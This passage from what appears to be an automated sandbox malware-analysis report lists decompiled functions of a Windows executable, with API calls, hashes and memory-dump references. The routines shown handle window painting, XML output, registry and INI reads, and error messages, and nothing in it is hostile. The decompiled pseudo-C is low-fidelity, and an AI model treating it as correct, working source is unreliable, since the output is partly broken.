                                                                                                                                                                                                                          0x004093df
                                                                                                                                                                                                                          0x004093e5
                                                                                                                                                                                                                          0x004093e6
                                                                                                                                                                                                                          0x004093ea
                                                                                                                                                                                                                          0x004093f6
                                                                                                                                                                                                                          0x004093fc
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x0040941d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409423
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409375
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040942e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x004094fb
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x00409337
                                                                                                                                                                                                                          0x0040950f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040939D
                                                                                                                                                                                                                            • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409488
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004094A9
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3300951397-0
                                                                                                                                                                                                                          • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                                                                                          0x00402ed7
                                                                                                                                                                                                                          0x00402eee
                                                                                                                                                                                                                          0x00402ef8
                                                                                                                                                                                                                          0x00402f00
                                                                                                                                                                                                                          0x00402f01
                                                                                                                                                                                                                          0x00402f05
                                                                                                                                                                                                                          0x00402f0a
                                                                                                                                                                                                                          0x00402f1a
                                                                                                                                                                                                                          0x00402f30

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                          • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                          			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                                                                                                                          0x004079a4
                                                                                                                                                                                                                          0x004079b8
                                                                                                                                                                                                                          0x004079bd
                                                                                                                                                                                                                          0x004079c2
                                                                                                                                                                                                                          0x004079c5
                                                                                                                                                                                                                          0x004079c5
                                                                                                                                                                                                                          0x004079db
                                                                                                                                                                                                                          0x004079f7
                                                                                                                                                                                                                          0x00407a06
                                                                                                                                                                                                                          0x00407a0c
                                                                                                                                                                                                                          0x00407a11
                                                                                                                                                                                                                          0x00407a13
                                                                                                                                                                                                                          0x00407a14
                                                                                                                                                                                                                          0x00407a17
                                                                                                                                                                                                                          0x00407a18
                                                                                                                                                                                                                          0x00407a1d
                                                                                                                                                                                                                          0x00407a22
                                                                                                                                                                                                                          0x00407a25
                                                                                                                                                                                                                          0x00407a2a
                                                                                                                                                                                                                          0x00407a35
                                                                                                                                                                                                                          0x00407a3a
                                                                                                                                                                                                                          0x00407a3b
                                                                                                                                                                                                                          0x00407a40
                                                                                                                                                                                                                          0x00407a52

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004079DB
                                                                                                                                                                                                                            • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                          • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                                                                          • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                                                                                                                          0x00404683
                                                                                                                                                                                                                          0x00404692
                                                                                                                                                                                                                          0x00404699
                                                                                                                                                                                                                          0x0040469b
                                                                                                                                                                                                                          0x004046af
                                                                                                                                                                                                                          0x004046ba
                                                                                                                                                                                                                          0x004046bc
                                                                                                                                                                                                                          0x004046c7
                                                                                                                                                                                                                          0x004046cc
                                                                                                                                                                                                                          0x004046cd
                                                                                                                                                                                                                          0x004046ee
                                                                                                                                                                                                                          0x004046f3
                                                                                                                                                                                                                          0x004046fa
                                                                                                                                                                                                                          0x004046fa
                                                                                                                                                                                                                          0x004046ee
                                                                                                                                                                                                                          0x00404705

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s\shell\%s
                                                                                                                                                                                                                          • API String ID: 1458959524-3196117466
                                                                                                                                                                                                                          • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                                                                          • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                                                                                                                          0x00409d5f
                                                                                                                                                                                                                          0x00409d67
                                                                                                                                                                                                                          0x00409d70
                                                                                                                                                                                                                          0x00409ddb
                                                                                                                                                                                                                          0x00409d72
                                                                                                                                                                                                                          0x00409d74
                                                                                                                                                                                                                          0x00409db2
                                                                                                                                                                                                                          0x00409d84
                                                                                                                                                                                                                          0x00409d84
                                                                                                                                                                                                                          0x00409d8c
                                                                                                                                                                                                                          0x00409d8d
                                                                                                                                                                                                                          0x00409d98
                                                                                                                                                                                                                          0x00409d9d
                                                                                                                                                                                                                          0x00409d9e
                                                                                                                                                                                                                          0x00409da6
                                                                                                                                                                                                                          0x00409daf
                                                                                                                                                                                                                          0x00409daf
                                                                                                                                                                                                                          0x00409dc3
                                                                                                                                                                                                                          0x00409dc3

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409D79
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                          • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                                                                          • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                          			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                                                                                                                          0x004047d2
                                                                                                                                                                                                                          0x004047da
                                                                                                                                                                                                                          0x004047e0
                                                                                                                                                                                                                          0x004047e4
                                                                                                                                                                                                                          0x004047ec
                                                                                                                                                                                                                          0x004047ec
                                                                                                                                                                                                                          0x004047f5
                                                                                                                                                                                                                          0x00404800
                                                                                                                                                                                                                          0x00404801
                                                                                                                                                                                                                          0x00404802
                                                                                                                                                                                                                          0x0040480d
                                                                                                                                                                                                                          0x00404812
                                                                                                                                                                                                                          0x00404813
                                                                                                                                                                                                                          0x00404834

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404813
                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                          • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                                                                          • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                                                                                                                          0x004068ec
                                                                                                                                                                                                                          0x004068f0
                                                                                                                                                                                                                          0x004068f4
                                                                                                                                                                                                                          0x004068ff
                                                                                                                                                                                                                          0x00406902
                                                                                                                                                                                                                          0x0040690a
                                                                                                                                                                                                                          0x00406910
                                                                                                                                                                                                                          0x00406911
                                                                                                                                                                                                                          0x0040691b
                                                                                                                                                                                                                          0x0040691e
                                                                                                                                                                                                                          0x00406923
                                                                                                                                                                                                                          0x0040692d
                                                                                                                                                                                                                          0x0040692e
                                                                                                                                                                                                                          0x00406933
                                                                                                                                                                                                                          0x0040693d
                                                                                                                                                                                                                          0x00406940
                                                                                                                                                                                                                          0x00406949
                                                                                                                                                                                                                          0x0040694a
                                                                                                                                                                                                                          0x00406950
                                                                                                                                                                                                                          0x00406956
                                                                                                                                                                                                                          0x00406959
                                                                                                                                                                                                                          0x0040695c
                                                                                                                                                                                                                          0x00406964
                                                                                                                                                                                                                          0x0040696d
                                                                                                                                                                                                                          0x00406974
                                                                                                                                                                                                                          0x0040697e
                                                                                                                                                                                                                          0x00406989
                                                                                                                                                                                                                          0x00406990
                                                                                                                                                                                                                          0x00406998
                                                                                                                                                                                                                          0x0040699b
                                                                                                                                                                                                                          0x0040699f
                                                                                                                                                                                                                          0x004069b8
                                                                                                                                                                                                                          0x004069bc
                                                                                                                                                                                                                          0x004069c4
                                                                                                                                                                                                                          0x004069c7
                                                                                                                                                                                                                          0x004069c7
                                                                                                                                                                                                                          0x004069cb
                                                                                                                                                                                                                          0x004069ce
                                                                                                                                                                                                                          0x004069d4
                                                                                                                                                                                                                          0x004069d4
                                                                                                                                                                                                                          0x004069d9
                                                                                                                                                                                                                          0x004069df
                                                                                                                                                                                                                          0x004069e6
                                                                                                                                                                                                                          0x004069ea
                                                                                                                                                                                                                          0x004069ef
                                                                                                                                                                                                                          0x004069f2
                                                                                                                                                                                                                          0x004069f5
                                                                                                                                                                                                                          0x00406a00
                                                                                                                                                                                                                          0x00406a01
                                                                                                                                                                                                                          0x00406a06
                                                                                                                                                                                                                          0x00406a08
                                                                                                                                                                                                                          0x00406a0b
                                                                                                                                                                                                                          0x00406a10
                                                                                                                                                                                                                          0x00406a16
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a18
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a27
                                                                                                                                                                                                                          0x00406a2f
                                                                                                                                                                                                                          0x00406a32
                                                                                                                                                                                                                          0x00406a35
                                                                                                                                                                                                                          0x00406a3b
                                                                                                                                                                                                                          0x00406a41
                                                                                                                                                                                                                          0x00406a47
                                                                                                                                                                                                                          0x00406a4d
                                                                                                                                                                                                                          0x00406a53
                                                                                                                                                                                                                          0x00406a5d
                                                                                                                                                                                                                          0x00406a6d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040696D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040697E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
